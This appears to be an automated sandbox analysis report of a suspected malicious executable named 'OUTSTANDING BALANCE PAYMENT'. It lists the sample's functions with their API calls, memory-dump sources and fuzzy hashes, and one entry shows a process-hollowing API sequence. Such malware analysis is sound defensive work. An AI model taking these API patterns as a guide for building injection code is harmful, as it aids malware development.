                                                                  Function 00282322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002824F1), ref: 00282303
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002825A1
                                                                  • CoInitialize.OLE32(00000000), ref: 00282618
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002F503A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID:
                                                                  • API String ID: 3815369404-0
                                                                  • Opcode ID: 9cc5c2f4908b5546e21827efa7b5c5b059aed7828356871c1b4faf651219dc73
                                                                  • Instruction ID: 6bef4c3e49d67fc3b94f9ad2a421cddcc6259abbe578b41a04551f822b2f3fce
                                                                  • Opcode Fuzzy Hash: 9cc5c2f4908b5546e21827efa7b5c5b059aed7828356871c1b4faf651219dc73
                                                                  • Instruction Fuzzy Hash: 9871AEBC952A418BC306EF5AE990495BBECBB5A344B804A6ED109CF7B1DFB06494CF14
                                                                  Function 00283A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 00283A73
                                                                    • Part of subcall function 002A1405: __lock.LIBCMT ref: 002A140B
                                                                    • Part of subcall function 00283ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00283AF3
                                                                    • Part of subcall function 00283ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00283B08
                                                                    • Part of subcall function 00283D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00283AA3,?), ref: 00283D45
                                                                    • Part of subcall function 00283D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00283AA3,?), ref: 00283D57
                                                                    • Part of subcall function 00283D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00341148,00341130,?,?,?,?,00283AA3,?), ref: 00283DC8
                                                                    • Part of subcall function 00283D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00283AA3,?), ref: 00283E48
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00283AB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 924797094-0
                                                                  • Opcode ID: 7350eb3cde508afe8aaebd4b5536c9e167293059d158d124f2e5883ecc5f3479
                                                                  • Instruction ID: bafa969f553c7fa454c736f41e10ca9e4dabf0a1cfffbdc1b471257249abe255
                                                                  • Opcode Fuzzy Hash: 7350eb3cde508afe8aaebd4b5536c9e167293059d158d124f2e5883ecc5f3479
                                                                  • Instruction Fuzzy Hash: 1411FD749143409BC301EF69E80590AFBE8EF86B10F00891FF4848B2A1CF70A5A4CF92
                                                                  Function 002AE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 002AEA29
                                                                  • __close_nolock.LIBCMT ref: 002AEA42
                                                                    • Part of subcall function 002A7BDA: __getptd_noexit.LIBCMT ref: 002A7BDA
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                  • String ID:
                                                                  • API String ID: 1046115767-0
                                                                  • Opcode ID: 4bc41d5bbddac539e0f5262f41c31c1590e0a9ec05284f9624b70192a1cc370b
                                                                  • Instruction ID: 67fd2c8fcc1833b847108f2750ec3c2a76e755fae7cca59b5a82af0b416e018d
                                                                  • Opcode Fuzzy Hash: 4bc41d5bbddac539e0f5262f41c31c1590e0a9ec05284f9624b70192a1cc370b
                                                                  • Instruction Fuzzy Hash: DD11CE729396109FDB12BF68D8423593A616F83331F2B4740E4305F1E3CFB498228EA5
                                                                  Function 0029F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002A395C: __FF_MSGBANNER.LIBCMT ref: 002A3973
                                                                    • Part of subcall function 002A395C: __NMSG_WRITE.LIBCMT ref: 002A397A
                                                                    • Part of subcall function 002A395C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000001,00000000,?,?,0029F507,?,0000000E), ref: 002A399F
                                                                  • std::exception::exception.LIBCMT ref: 0029F51E
                                                                  • __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                    • Part of subcall function 002A6805: RaiseException.KERNEL32(?,?,0000000E,00336A30,?,?,?,0029F538,0000000E,00336A30,?,00000001), ref: 002A6856
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3902256705-0
                                                                  • Opcode ID: 4163186c127e4baa4ddb7f544c40c74f6feb003f1173367870313c8f844b333f
                                                                  • Instruction ID: 56ed46a6210e7bb6ce9d423d1627f14b4569661d1d682a475132de76b59058d0
                                                                  • Opcode Fuzzy Hash: 4163186c127e4baa4ddb7f544c40c74f6feb003f1173367870313c8f844b333f
                                                                  • Instruction Fuzzy Hash: 49F0223112020EABCB41BF9CDD129DE77ECAF01314FA48036FA08D2081CFB0D6608BA5
                                                                  Function 002A35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • __lock_file.LIBCMT ref: 002A3629
                                                                    • Part of subcall function 002A4E1C: __lock.LIBCMT ref: 002A4E3F
                                                                  • __fclose_nolock.LIBCMT ref: 002A3634
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: 66165a3f85b13b3a9f149c29134dd34f172c726db198fe8e6c8b9eca53807764
                                                                  • Instruction ID: 1b1b96826a8e972f563e1ef9ecd897d6b88cc31aee0cf6770695c52a9516ed90
                                                                  • Opcode Fuzzy Hash: 66165a3f85b13b3a9f149c29134dd34f172c726db198fe8e6c8b9eca53807764
                                                                  • Instruction Fuzzy Hash: 33F02B31C20200ABD711FF65880675EB6A46F43730F298108F420AB2C1CF7C86259F59
                                                                  Function 01226AA5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01227263
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012272F9
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0122731B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                  • Instruction ID: 548b66b87e872a28e138727a763637f6b96d02ac0be225e25ac90f0fc82e0594
                                                                  • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                  • Instruction Fuzzy Hash: 6912BF24E28658C6EB24DF64D8507DEB232EF68300F1051E9D10DEB7A5E77A4E81CF5A
                                                                  Function 0028E8A0 Relevance: 1.7, APIs: 1, Instructions: 209windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028E959
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePeek
                                                                  • String ID:
                                                                  • API String ID: 2222842502-0
                                                                  • Opcode ID: 9dfbf4a14d7b46e5f0ece3bc26cde004ce95bad01a8dc996e915d79ba5b43d2e
                                                                  • Instruction ID: e9ec7d3dc29881a853f059103a103c049db2faa47e6b825f1a0c471e094ba99d
                                                                  • Opcode Fuzzy Hash: 9dfbf4a14d7b46e5f0ece3bc26cde004ce95bad01a8dc996e915d79ba5b43d2e
                                                                  • Instruction Fuzzy Hash: 00817A748197858FEF26DF24C48436ABBD0BF12304F0945BEDE858F2A2D7749894CB42
                                                                  Function 002A2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __flush.LIBCMT ref: 002A2A0B
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __flush__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 4101623367-0
                                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                  • Instruction ID: a9ce88dedca19ad6152637cb382936475ba01c91cb1b58aac354b8e5744eb2b0
                                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                  • Instruction Fuzzy Hash: BA418031620707DFDB288FADC8805AF7BA6AF46760F24852DE855C7241EF70DD698B40
                                                                  Function 0029ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: 24e6574b68826d2333d1eed18eefbdb987117191657320e6110472f7568d49e6
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 8931DA74A20106DBDF18DF58C480969FBBAFF49340B6686A5E409CB355DB31EDD1CBA0
                                                                  Function 002F9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: cddf11609ad2f43c8bb006cf82f111d2935c50c0ac9c96bf72a635c96a3732f6
                                                                  • Instruction ID: fa7f221194de064d28aebe2754482625d6a079ceb1bab39ff6ca1c1814af730c
                                                                  • Opcode Fuzzy Hash: cddf11609ad2f43c8bb006cf82f111d2935c50c0ac9c96bf72a635c96a3732f6
                                                                  • Instruction Fuzzy Hash: 0C417E745146068FDB24DF14C484B1ABBE0BF45348F1989ACE99A4B362C372FC95CF52
                                                                  Function 002841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00284214: FreeLibrary.KERNEL32(00000000,?), ref: 00284247
                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002839FE,?,00000001), ref: 002841DB
                                                                    • Part of subcall function 00284291: FreeLibrary.KERNEL32(00000000), ref: 002842C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load
                                                                  • String ID:
                                                                  • API String ID: 2391024519-0
                                                                  • Opcode ID: 7828da9fff670a33947c64794923d7b0a3aefc6450e867f6679c0038e37b149d
                                                                  • Instruction ID: 3c5f66d78d239057e5bbf82b21c7e5da9b480e51e2e03e721db198541bd870f5
                                                                  • Opcode Fuzzy Hash: 7828da9fff670a33947c64794923d7b0a3aefc6450e867f6679c0038e37b149d
                                                                  • Instruction Fuzzy Hash: 3911E735625207ABCB10FF70DC16FAE77A99F40700F108429F996A61C5DEB49A209F60
                                                                  Function 002F9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 6908bead84e554faee7ebcae05280f9e29c630f67b0d78c2e0dc63352d79fad6
                                                                  • Instruction ID: 867c7f8c72051738ef73a6ff9cd812a004fcca727692e82cc4e45060177447fc
                                                                  • Opcode Fuzzy Hash: 6908bead84e554faee7ebcae05280f9e29c630f67b0d78c2e0dc63352d79fad6
                                                                  • Instruction Fuzzy Hash: A5216970528206CFDB64DF24C484B1ABBE1BF89304F25496CE69A4B261C731F865CF92
                                                                  Function 002AAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 002AAFC0
                                                                    • Part of subcall function 002A7BDA: __getptd_noexit.LIBCMT ref: 002A7BDA
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 1144279405-0
                                                                  • Opcode ID: 596a17698899a1ce8fbda39e9bf26f6e343f1cfba7f99fa7e42586ddf3c1c022
                                                                  • Instruction ID: 2214288142d9c50723ec9b06b83ca50548530d2fc3cfb8f21ad56993d7bdfcf8
                                                                  • Opcode Fuzzy Hash: 596a17698899a1ce8fbda39e9bf26f6e343f1cfba7f99fa7e42586ddf3c1c022
                                                                  • Instruction Fuzzy Hash: 70119A728396009FD7176FA49C4276A7AA1AF43335F2A4640E5345F1E3CFB48920CFA5
                                                                  Function 002839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                  • Instruction ID: 08b1d30a9b26d2eb7b2f7437143802dce7f89f8dbc0784ec883b42ed02810e38
                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                  • Instruction Fuzzy Hash: 8F01623552110EEF8B04FF64C8918FEBB74AA11344F10812AA515971D5EA309A69CF60
                                                                  Function 002A2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 002A2AED
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: f8ed488d2d8cdb15b0003cf571ed384e6c308a9ac2060c51c8023034e68b0548
                                                                  • Instruction ID: 9c2606bf084feafe40d950733375a58fe5c454cb58eba591b70a7705e2f57597
                                                                  • Opcode Fuzzy Hash: f8ed488d2d8cdb15b0003cf571ed384e6c308a9ac2060c51c8023034e68b0548
                                                                  • Instruction Fuzzy Hash: 58F0C231520216EBDF21AF688C067DF36A5BF02320F198415F8149A192CFB88A7ADF51
                                                                  Function 00284252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,002839FE,?,00000001), ref: 00284286
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: c863906e69fbc1d60134a1850ba663b88c8fb8c62c7adc2467532e5040958475
                                                                  • Instruction ID: 2731fbdc8a497d762724c10a574aa69e8d7b0828656f9305b2a2284236f071f5
                                                                  • Opcode Fuzzy Hash: c863906e69fbc1d60134a1850ba663b88c8fb8c62c7adc2467532e5040958475
                                                                  • Instruction Fuzzy Hash: A2F0397952A703CFCB34BF64D890816BBE4BF043253248A3EF9D682659C7729860DF50
                                                                  Function 002840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002840C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
